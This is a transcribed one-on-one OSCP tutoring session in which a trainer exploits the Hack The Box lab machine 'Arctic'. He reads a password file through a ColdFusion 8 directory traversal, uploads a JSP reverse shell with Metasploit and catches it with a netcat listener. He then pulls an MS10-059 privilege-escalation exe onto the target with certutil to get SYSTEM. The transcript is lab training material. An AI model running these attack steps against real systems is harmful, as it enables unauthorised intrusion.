Okay, so can you see my screen now?
Yeah.
Okay, great. So for today's session,
Mm-hmm.
we are going to do something new, something interesting today. Okay, so the machine that we are going to do is Arctic. Okay, CD. So let's go to my hack the box and let's deploy the machine. Here is the machine named Arctic, that is 10 10 10 11. Let's click on deploy. Let's do a reset as well. Okay, let's try to ping the machine. Okay, so we are able to ping it. Great. So let's start with our nmap scan. Okay, so starting with the very basic nmap scan, press enter. Host seems to be down. Maybe the machine was getting reset. Meanwhile, for our efficiency, let's run another nmap scan,
Mm-hmm.
doing a full board scan.
So I have a question, Rishabh.
Yes, go ahead.
I've been reading this little bit nmap commands. This T4 in nmap scan.
Hyphen T, hyphen
Mm-hmm.
capital T 4.
Captain T4, yeah. Something for
Yeah.
yeah.
So what is the use of that?
Yeah, yeah.
Okay, so basically there are certain flags like, let me just show you. Nmap hyphen P hyphen hyphen and hyphen AV, let's say target IP address hyphen capital T4. Okay, so the value for T ranges from 0 to 5. It can be anywhere from T0, T1, T2, T3, T4, T5. And this is
Mm-hmm.
basically your timing technique. Okay, this is your timing technique. So what happens in here is, if I'm going to use hyphen T5, it is going to send packets very fast.
Mm-hmm.
If I'm going to mention T0, it is going to send the packets really, really slow.
Mm-hmm.
Okay. So if I'm not going to mention any of these T flag, so by default, T3 is the value that
Mm-hmm.
is chosen by default by nmap. So that is the average speed, like 10 packets per minute, something like that. Okay.
Mm-hmm.
T4 means a little bit faster than T3. T5 means very fast, aggressive, highly aggressive.
Resist. Mm-hmm.
Okay,
Okay, yeah.
got it?
Yeah, yeah, got it. Okay.
Right. So that is the meaning of these T flags. These are basically, you can say, timing techniques.
Uh-huh.
Okay. So our very basic nmap scan is done now. Let's try to run it again. 10 10 10 11. I hope the target IP address is correct.
Yeah.
Arctic 10 10 10 11. Yes, the target IP is correct. Let's wait for the output again once more. Still it is showing me 1358500495154. So nothing is standard here. So only 135 and 49154 is standard ports here. Okay, we have got a new finding over here, that is 8500. Okay, so port number 8500, let's try to run a version detection scan against these ports. 8500 49152 154. Okay. Okay, so I have already created a report for this. Let me just have a look. Okay, I have everything mapped out here. Nice, great. Well, anyways, let me just minimize it, close this thing. So I'm waiting for the version detection scan to complete, because up till this point I do not know how to proceed further. Okay, so I'm waiting for the version detection scan. Let's see if something interesting appears here. Taking some time. Okay. I think it is stuck on 66%. I hope the machine is already reset. Yes, the machine is already reset. Okay, so we have the output here, and the output says that 135 is a standard port, SMB port, MSRPC is running. Okay. On port number 8500, Nmap is not able to identify the service. Okay. It says FMTP. Let's see if we are able to understand anything by FMTP. FMTP. What is FMTP? Flight Message Transfer Protocol. Okay. Okay. File Multicast Transport Protocol, FMTP. Okay, so what I can try doing is, I'm just trying to explore this stuff. So what I'm going to do is, I'm just going to give it a try,
Yeah.
opening it in a browser, colon 8500. So it took a while, but finally the website got opened, and I have something over here, something like CFID and CF docs.
See those.
Okay. So now what I'm going to do is I'm going to explore this stuff. Let's see. CF docs. What do we have here? Still loading. Finally opened. A bunch of directories, a bunch of HTML files, and a bunch of CSS files are here. Okay, let's go back. Let's go to CFID. When you are going to approach this machine for the first time, you need to explore everything manually. So just like I opened CF docs, there were a bunch of files in there, a bunch of directories in there. So you need to manually poke those files around. Okay, you need to see, you need to try to open those directories. But why I'm not going to go down that path is because what I can observe here is every time I'm clicking on something, it is taking a lot of time to load it, right? So that's why
Yeah.
I'm not going to explore it here and there. So I went to CFID and I have
Administrator.
something interesting here like administrator. So let's click on it. And it got loaded finally, still loading. But uh, in the tab title, I can see it is saying something like Cold Fusion Administrator, something like that. Okay, so finally the page has been loaded now, and it says Adobe Cold Fusion 8 Administrator, something like that. Okay, so from this point, what I can do is I can try logging in using default credentials. Okay, like admin, admin password, admin 123456, something like that. Parallelly, what I can do is I can search for Cold Fusion 8 exploit. I found two exploits over here. So let's open it. So it says there's a directory traverser where here we have a directory traverser. Okay. So for automating this stuff, we have an exploit over here. So I can download this exploit and run it. That's one way. Or I can just understand this exploit and try to do it manually. So from here I can understand that it is making a GET request to this path. So let's just copy this path. Control C. Paste it, press enter. And it's a local file inclusion exploit. And I believe what it is going to do is it is going to show me this file, password.properties. Let's wait for it to load. And finally, we have this thing here. We have the LFI here.
Mhm.
Let me try to annotate it. Here is the LFI. Okay. Here is also the LFI. So basically what I'm provided is I'm provided with the contents of that file. And in that file, I have something like password is equals to something, something. Okay.
Mhm.
And it is saying encrypted is equals to 2. So probably
Mhm.
this is not in plain text. This is in some sort of hash format. So I'll try to crack this password. Let's do a clear screen here. Let's copy this thing. Let's go to crack station and paste it over here. And the password is happy day. Okay. So, okay. I can try logging in with these credentials like admin happy day, something like this.
Mhm.
Let's see what happens. Pasted happy day, press enter. See, one thing is sure that this application is maybe designed in this way that it is probably taking 30 seconds, I believe,
Mhm.
in
Yeah.
each request. In every request, it is taking around about 30 seconds to load. It is still loading. But one thing is assured here that I have logged in. The credentials that I have found is right here.
Yeah.
Okay, so this is one way of exploiting this thing. This is one way.
Mhm.
But I have found some other exploits as well, like arbitrary file upload and something like Cold Fusion 8.1, arbitrary file upload and execute. It is a Metasploit module.
Mhm.
Okay, I'll look into this as well. So let's do one thing. Let's do clear here. Sudo msfdb start. Sudo msf console. I'm going to open the Metasploit framework. I'm going to look for the exploit.
Mhm.
I'll try to exploit it that way as well. Okay, let's do a search. Cold Fusion exploits. I'm going to use this one. Arbitrary file upload and execute.
Mhm.
Okay, so let's copy it. Show options, and it is saying me, it is telling me to enter the R host, R
Ah,
port,
both.
L host, and L port. So let's set these values. Set R host. So the values has been set now.
Mhm.
Okay. Now let's run this thing. And it says sending our post request, upload failed, exploit completed, but no session was created. But did you just saw that how quick it was?
Yeah, it's a fast, yeah.
So basically what I can understand here is that maybe that this exploit actually works, but because there is some sort of time limitation in the application, that's why my Metasploit framework is not able to understand this thing, that if it is able to upload the exploit or execute the exploit or not. Maybe it is getting timed out.
Mhm.
So what I am going to do here is I am going to troubleshoot this exploit. I'm going to observe this working of this exploit. So how I'm going to do that is I'm going to use burp suite to intercept all the requests made by this exploit. So let's fire up our burp suite. This is not burp suite, this is Firefox. Let's start our burp suite. Okay, let's go to proxy tab. Let's go to options. Let's set up a new proxy here. Bind to port 8500, request handling. So what I'm going to do is I'm going to uh, tell my burp to intercept all the requests from my machine and forward it to my target, that is Arctic, on this port. So let's press OK. The proxy is set up now. Let's intercept is on. Okay. Or I can do an intercept off. Let's modify the exploit. Set um, our port is right, our host 127001, and click on run. So what we are going to see is all these requests are going to be now passed through the burp suite. Okay, we have a request over here. It is trying to upload some file. Okay, upload failed, exploit completed, but no session was created. Okay, let's get back to the burp and send this request to the repeater and try to understand this request once. So what I can see is this is trying to upload some file named this JSP, and it is trying to execute cmd.exe command prompt and getting a reverse shell on this socket.
Mhm.
So what I'm going to do is I'm simply going to forward this request from here. The request is sent. There is no response yet. Okay, why? Because it is going to take probably 30 seconds for the application to respond back. So I'll
Mhm.
wait for that time. Let's see. Did not receive any response yet. Okay. Why are we not receiving any response? Because the IP address is localhost. So let's do one thing. Let's change the IP address here. 10, 10, 10, 11. And it is still waiting for the response. This target machine is really very slow. Let's click on cancel. Let's try to send the request again. It says waiting. A lot of time. By this time, we must have intercepted the request. Okay, let's try to open 127.0.0.1. 8500. Okay, C file. There's something new here.
User files, yeah.
User files. Let's see. It is saying done. Okay. Let's see. Yeah, so the file is actually created here. That is VHSRZSTIS. And this is the same file which we're trying to create. So this is our reverse shell basically. And before executing that file, let's start up a listener over here. nc-nvlp 4444. Okay, so that 134. As you see that I entered the L port as 4444. Now I'm listening for the incoming connection, and let's execute this file and see if we are able to get a shell back or not. So our reverse shell got executed and we have a shell back, right?
Yeah.
Okay, so the main thing that we need to understand here is why I choose the Arctic and why I choose this method only for getting a reverse shell here is because I wanted to show you that how you can intercept the Metasploit request in Burp Suite. Okay, and how in this scenario intercepting the request was helpful for us. This exploit was right, this exploit was working, but due to certain time restrictions here, we were not able to exploit this machine completely, right? We were
Mhm.
not able to get the shell, but now we have a shell. So who who am I? I am Arctic Tolis. So some sort of a user on this machine.
Mhm.
Okay. Some sort of low privilege user on this machine. Okay, not an issue. So, but with this user, I can try to read the user flag at least. So let's try to read the user flag. Okay, my shell died. Let's run it again. Okay, let's do cd dir cd users dir. We have a user called Tolis.
Mhm.
Let's move into it. Let's go to desktop. And I have a user.txt here.
Mhm.
Let's try to read this thing. And this is my user flag over here.
Mhm.
Just copy this flag, go to your hack the box and paste it over here.
Mhm.
Okay, let's get back here. So now I want to escalate my privileges
To
to
admin,
the
yeah.
admin.
Mhm.
Okay, so how I'm going to do that? While enumerating the machine locally,
Mhm.
I'm going to do the first thing that I'm going to do is system info. I want to see what kind of target operating system it is to be precise,
Mhm.
like what Windows, what version. Let's see. Okay, let's do a full screen over here. So this is my Microsoft Windows Server 2008.
8%.
Okay, and the OS version is 61760. Okay, it is a 64-bit operating system. Okay, and something of my interest is the hot fixes. So we have no hot fixes
No
here.
updates. Mhm.
That means the Windows, this Windows 2008 server has never been patched, has never been updated. Okay. And it's a relevantly old server. So we must be having some sort of exploits available online, readily available online.
Mhm.
Priv-esc. I can search for privilege escalation. exploits, Windows 7, 2008. This is one. I can use this one as well. A lot of exploits are available. Some sort of guide is available here on Pentest Lab. I can follow this guide as well. It is using Windows Exploit Suggester. Okay. So let me introduce you to this amazing tool, that is Windows Exploit Suggester. How to use this tool. So a bunch of exploits are available here. MS11046, MS16032. Okay. And if I would keep on searching, I'll find some more exploits over here. Okay. Let me remove these pointers first of all. Privilege escalation, Windows, cybersecurity help.cc. Let's see. Well, so let's just search for Windows Exploit Suggester. Windows Exploit Suggester. And here I have this tool. There are two tools out there. Windows Exploit Suggester and WESNG. So what I have done is I have already downloaded these exploits. Okay. So these are not the exploits. These are like scripts which are used for, which are going to help you out during the privilege escalation step. Okay. So, okay.
I have a question.
Yeah.
So when you are taking your OSCP exam, we can use all this stuff like internet, everything, like OS open source.
These exploits, these scripts.
Yeah, scripts, and you can use internet also in OSCP exam.
Yes, you are free to use internet.
Anything.
Yeah, anything. Okay.
I heard that you can use only once this Metasploit tool.
Yeah, Metasploit is allowed only for once, but these enumeration scripts, you can use it for infinite time. That is not an issue.
Okay.
And any of these scripts, see, burp is also allowed. Burp tool is also allowed, burp suit. But the only thing is the pro version of burp suit is not allowed. Okay.
Okay, limited access. Okay.
Sorry, I didn't got you.
Now, when burp suit is not pro is, I mean, you can use only limited to burp suit, right?
Yeah.
Some accessibility is restricted.
Yeah. So we, and in this training as well, we are not going to use any pro tool. We are not going to use any premium tool here. We are just going to rely on the free and open source stuff, whatever is readily available. Okay. Okay, so let's just clone it, copy it, and git clone it. What I have done is I have my directory over here. Let's do sudo git clone followed by your path, and I have already cloned it. As you can see, I have my Windows Exploit Suggester over here and WESNG over here. Okay, so I can just go to WESNG, and this is a Python file. cd another Windows Exploit Suggester over here. So let's try to run this one. Let's do /, not enough arguments. Okay, we'll look into the arguments as well. But before that, what we need to do is, whatever is the output of this command system info, we need to copy this output, copy selection, and paste it in a file.
Uh-huh.
So I have already pasted it in this file. You can see cat sysinfo.txt, and you can see it here. I've already pasted this output in a file. So the file name is system info. Okay. Okay. Let me just uh, see. Now let's try to run this uh, script, Python script. So I did -h for help. Okay.
Uh-huh.
Telling me that what flags do I need to use. So first of all, it says -u is required flag to even run this script. So let's do -u. Okay, what does it says?
Permission denied.
Okay, permission denied home. Let's run sudo. Writing to the file done. This is the database that we are going to use. Let's do
Uh-huh.
hyphen I for system info. Okay, -d for database. So let's do -d database -i, or let's do hyphen system info. This is better. And provide the path for your text file wherever you have created. So I have my file in the htb arctic system info.txt and press enter. So it is simply going to take the output of that file, the system info file, and it is going to look into what all exploits are available with that regard. So let's see. We have a bunch of exploits over here. Okay. Let me just do one thing. I can just copy paste these exploits in a file and do a grep for privilege escalation, or I can just manually go through these exploits that which of them is R for privilege escalation. So critical, allow privilege escalation, critical. Okay, privilege escalation, all of them remote code execution. Okay, I believe MS 10073 is something that I can recall from. I believe this is chimichurri. Let me just confirm it if I'm not wrong. Control T, Google chimichurri, not the sauce. I'm looking for the exploit. Okay, chimichurri is MS 09012. It is not here. Why it is not here? I don't know. Churrasquito, churraso. So these are very famous exploits against Windows 2008 servers. Okay,
Uh-huh.
that's why I remember these exploits by name. But for you, what you can do is you can just copy these MS vulnerability versions and search for. You can try to read it over this official website, Microsoft Security Bulletin. I can just search for exploits over here. That's one way of doing it. And MS10073, MS10073 exploit DB. Rapid7 is also providing us with the exploit. GitHub link is here. Okay. So an executable file is provided here. I can give this one a try. Okay. But what I have done here is, give me a quick second. Where is it? See, the point is, what is the point here is this becomes hectic now. Like you need to explore what all exploits are going to work and what all are not going to work. Okay. So I already know I have already tried MS 11011, which was not working here. Okay. But you can give it a try. I'm directly going to search for MS 10059. Okay. I have not tried all of them. Okay. But once I tried this one, it was working. So what I'm going to do is I'm simply going to go to Google, bhaiya, tell me the exploit. And I believe this is the chimichurri exploit. Let's say, let's see. Okay, this is Churrasquito. Uh, MS10059 EXE is available over here. I can try to download this EXE, run this EXE. Okay, that's one way out. Exploit GitHub. Yeah, this is my trusted GitHub egress. So when I'm going to run exes from the internet, I would prefer to run it from the trusted source instead of just taking an exe from anywhere and directly running it. So MS10052 is here. Chimichurri, click on it. Okay. Let's click on download. So this exe is now going to be downloaded. Let's click on save. My call is, or my browser is marking it as a malicious file. I already know it's a malicious file. Remove file, click on open. Let it download. The file has been downloaded now. You can see it here. Let's just cut it. And to be organized, I'm going to go into my, okay, so I already have it here, but I just renamed this exploit to Prevesk. Okay. These are one and the same things. You can see the size 766, 766. Okay. Okay. So now I have this exploit over here. Let's go to this directory. Let's start a server over here. Sudo python 3 -m http.server, and let's download this file over here. Let's see if the connection is still alive. Let's download this file. Let's do cert util -url cache -f http 10 10 14 7 10 10 14 7 colon chimney chewing. Or let's do one thing. Let's change the file name to chimmy.exe. chimney.exe and save the output with the name as, let's say, privesc.exe and press enter. We got a call here. Let's do a dir. We have successfully downloaded this exe. Okay, great. Now let's execute this thing. Before that, let's start a listener over here. Let's do it 6789. Let's run this command privesc.exe 10 10 14 7 6 7 8 9 and press enter, and we'll be getting a shell in no time. Let's see. Okay, so we got a shell back here, right? Let's do who am I, and I am
Ending, yeah.
NT authority system, right? So this could have been a very hectic procedure as well if I would have been trying it manually for all the different exploits which were suggested to me. This could have been a very laborious and tedious task, but I already knew it. Okay, but when you are going to do it for the first time, it is going to be a bit of frustration. Like you are downloading the exploits, you are trying to run the exploit, but it is not working. You are not getting a shell back. Okay, or if you are getting a shell back, it is not the anti-authority system. So that is the thing here. Ideally, what happens is when you are going to do this machine by yourself, this is probably going to take you somewhere from 6 to 12 hours. Okay, but in here in the sessions we try to wrap it up within an hour or hour and a half. Okay, this is just to summarize the key learning points here. Okay, but definitely you are open to exploring this stuff with a blank mind. Okay, so let's do dir. Let's do cd dot dir cd trator dir cd desktop dir type root.txt. We have the root flag. Let's get back here and submit this flag over here, and it's done. Okay. Nice and tight, something new to learn. Not something, there were a lot of things covered in this machine. Okay. Maybe it is smooth as of now. Okay, but I would suggest you to give this thing a try by yourself, and you will end up in a lot of errors and problems in between. So okay, anyways, you just do one thing. You mail me your notes, whatever you have created, that you have created for the previous machine. I'll have a look, and I'll suggest you to create a documented report for this machine as well. That is Arctic.
Okay.
Give it a try. See, and there are multiple ways for routing this machine. Okay, this is not the only way. Okay, so yeah, and that's all. Do you have any doubt? Anything that is not clear?
So far, no, but I will write it down if anything when I practice it.
Mm-hmm. Right. Okay. So far, no. let me share certain resources with you. So the exploit that I used is this one. Let me share this thing in the chat. This is the exploit exe. For further references, you can refer to this GitHub repo for more exploits. You can try the same thing with this exploit as well. ms10.059.exe. You can try it with this one as well. You can try the same thing with this exploit as well. Try to download the exploit and send it. I've already shown you how you can send the exploit from your Kali to the Windows machine. Then certain GitHub pages to git clone. This is the Windows exploit suggestor that we used for suggesting us the exploits. And we have another exploit suggestor over here. Okay. Another point of reference article is here. Crack station is something which is going to be used by you day in and day out. Every time you want to crack a password, this is the website that you should go for. Cold Fusion. Okay, you can use this Metasploit reference link as well. Okay. And I use this exploit. I did not use this exploit. I just read this exploit and tried to read the password or read the credentials for login. Okay. So I could have downloaded this exploit. This is a Python exploit, and I could have ran this exploit, and then the output would have been the same. But instead of doing all that stuff, I just read the exploit, understood it, and did it manually by myself. So let's share this as well. So I'm sharing all these links in the chat. You can take a backup of these links, at least copy them for your further reference. Okay. And arbitrary file upload. Okay. Yeah, we use this exploit. This is the manual way of doing it, but we use this thing in the Metasploit, using the Metasploit framework. The exploit was this only, unrestricted file upload in Adobe Cold Fusion. Okay. What else should I share? You can take a reference of this as well. Downloading files with certutil. Okay. And using Bob to intercept MSF. Okay. Not able to find anything good here. Nope. Well, anyways, I've already shown you how you can do this thing
Uh-huh.
practically.
I will search here.
Yeah. Okay. All right. So, yeah, that would be all. So, that would be all from my side. Okay. For today's session. If you have any doubt, you can ask me now. If you want me to iterate something, I can do it now. Go ahead. Tell me.
So far, no.
Okay. Great. If everything is clear, that's good.
Ah,
Okay.
I tried to save this chart file.
Mm-hmm.
My antivirus is blocking it.
That exe file.
Mm-hmm.
Yeah, so yeah, your antivirus is going to block it as it's a malicious file. Okay.
This is not the only one. I think I have also tried. I mean, I am also learning other from this Linux Academy
Mm-hmm.
because which is free for Amazon employees.
Okay.
I'm using my brother-in-law's account, so it's in USA. I'm learning on my name.
Mm-hmm.
When I download the free course completion certificate, it's showing me same error, even it is a PDF file.
Even for PDF files, maybe maybe something is actually malicious in there.
Maybe, but it's an official academy, but I don't know how come.
Yeah,
There is
that
a
is
virus in it.
yeah.
Mhm.
Mm. You can just
Uh,
yeah.
yeah, this open source intelligence, there is any course in CRA who is teaching something,
For what?
especially CREST,
For
this CREST open source intelligence, STAR, yeah.
okay, OSINT. Yeah, saying.
Mm-hmm. OSINT, yeah.
So is there a certification for OSINT?
Mm-hmm. From them, yeah.
I believe Crest used to give this certifications for pen tests, threat intelligence, but
They
I
have
don't
this
know.
also, pen test also they have.
Yeah, but I'm not aware of this
Mhm.
OSINT one. Where is it? Let me just search for it.
The title of examination is Threat Intelligence Analyst, TIA.
Just give me a second.
Ah, sure, sorry.
Crest, Crest. What next?
Threat Intelligence, Intelligence Agent, Analyst, sorry, TIA. Yeah, this one only.
Okay, so no, so far nothing related to this stuff is offered, but you can definitely try to confirm this thing with the point of contact, with
Mm-hmm.
whosoever is the counselor who is assigned to you. You can
Not only Crest, is there any other TIA?
threat intelligence, right?
Mm-hmm.
I believe there is something offered. I believe it is CTIA. I'm not sure about
Mm-hmm.
that. Okay, that's why I'm saying you that you need to confirm this thing uh, with the counselor.
Mm-hmm.
Yeah, whosoever you are. I believe Miss Yogita is assigned to you, right?
Mm-hmm.
Right. So you can just ask her if the CTIA something like that certifications or trainings are also available. Okay. She would be able to guide you this thing with respect to this thing in a better way.
Okay, then so far I have no doubts. That's it all
Okay,
for today.
great.
Yeah. How is your preparation going for CISA?
It's for CISA.
Mm-hmm.
Okay, I'm not preparing for CISA. I am already ISO ISMS 27001.
Yeah, but you said
certified.
you're also writing CISA. You told me, I remember.
Yeah, right now I'm not going for the
Okay.
CISA. I'm preparing for the OSCP instead.
Okay.
Yeah, I'm planning for the OSCP in the near future.
Mm-hmm.
Yeah, so far so good. It's good enough.
Okay.
Yeah, once OSCP is done, then I'll move towards the CISA stuff.
Mm-hmm. Do you know this company in Delhi, Lucidis something?
Sorry, happening in
In Delhi, there is a cyber company, Lucidos, or what's the exact name of this?
yeah. There's a company Lucidius.
Yeah, yeah. They
Mhm.
are doing pen test for this company, Bioformis.
Okay, so Lucidius is doing a pen test for whom?
Bioformis, it's a Swiss company, pharmaceutical.
Okay,
I think I'll type you.
Bio 4.
Biofor, yeah, Bioformis. There is one company.
Okay, Bio 4.
It's also located in Singapore. Text.
Okay,
Yeah, this one. Yeah, they are doing pen test for this one. Yeah.
okay.
There is one more company from Delhi. It's called TAC.
TAC.
Yeah,
Yeah, I know that as well.
they
That
are
is.
also doing same work. Especially they have this their own tool for this vulnerability assessment for this company.
Mhm. Right. I believe TAC is Chandigarh based, if I'm
Mm-hmm.
not wrong. I don't know if they have an office in Delhi as well. Probably they. It's
Not in Delhi. They are also doing from these two companies working for.
okay. Okay. Yeah. These are certain cybersecurity, certain famous companies here. Okay.
Okay then.
Okay then, Kiran. Have a great day ahead.
Have a great day too, Rishabh. Thank you very much.
Take care.
Take
Bye
care. Bye
bye.
bye.